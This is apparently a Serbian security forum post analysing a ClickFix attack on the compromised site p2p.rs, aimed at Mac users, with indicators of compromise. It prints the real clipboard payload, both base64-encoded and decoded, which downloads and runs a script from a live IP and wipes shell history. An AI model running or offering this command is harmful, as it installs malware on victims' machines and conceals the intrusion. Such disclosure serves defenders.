Kompromitovan p2p.rs - clickfix napad
#2

Još uvek se učitava ali samo za MAC User-Agent, Windows izbegava.

Prvo proverava ko si šta si, izbegava botove i stavlja žrtve u dve grupe te prezentuje različiti JS u zavisnosti od grupe :

   

Onda prikaže:

   

Pa kad se klikne:

   

u klipbord stavlja :

Code:
echo 'I am not a robot - reCAPTCHA Verification ID: 706200' && echo 'ZXhwb3J0IFNSQ19VUkw9J2h0dHBzOi8vd3d3LnAycC5ycy8nICYmIChjZCAvdG1wICYmIGN1cmwgLWtmc1NMICJodHRwOi8vNDYuMjI2LjE2Mi4yNDEvNDExZjdkM2JmZjMxYT9mb3JjZT0xIiAtbyAucndtUHZ2ICYmIGJhc2ggLnJ3bVB2diAmJiBybSAtZiAucndtUHZ2KSA+IC9kZXYvbnVsbCAyPiYxICYgY2xlYXI7IHByaW50ZiAnXDAzM1szSic7IGhpc3RvcnkgLWQgJChoaXN0b3J5IDEgMj4vZGV2L251bGwgfCBhd2sgJ3twcmludCAkMX0nKSAyPi9kZXYvbnVsbDsgZmMgLXAgL2Rldi9udWxsIDI+L2Rldi9udWxsOyBwcmludGYgJ1xuICBcMDMzWzMybVx4ZTJceDljXHg5MyBWZXJpZmljYXRpb24gc3VjY2Vzc2Z1bFwwMzNbMG1cblxuJw==' | base64 -D | bash

base64 enkodovan deo postaje :

Code:
export SRC_URL='https://www.p2p.rs/' && (cd /tmp && curl -kfsSL "http://46.226.162.241/411f7d3bff31a?force=1" -o .rwmPvv && bash .rwmPvv && rm -f .rwmPvv) > /dev/null 2>&1 & clear; printf '\033[3J'; history -d $(history 1 2>/dev/null | awk '{print $1}') 2>/dev/null; fc -p /dev/null 2>/dev/null; printf '\n  \033[32m\xe2\x9c\x93 Verification successful\033[0m\n\n'

payload sa IP adrese je https://www.virustotal.com/gui/file/04b8...1c2a9cd5f/

   

IP adresa pripada AEZA GROUP LLC, RU, provajder koji je pod američkim sankcijama i čija mreža se često koristi za prevare i kompromitacije

pre rogethat231[.]icu koristili su fochinal5123[.]life koji je bio na 77.110.127.182
Reply


Messages In This Thread
Kompromitovan p2p.rs - clickfix napad - by VincaSec - 08-08-2026, 03:49 PM
RE: Kompromitovan p2p.rs - clickfix napad - by milos_rs - 08-08-2026, 06:13 PM

Forum Jump:


Users browsing this thread: 1 Guest(s)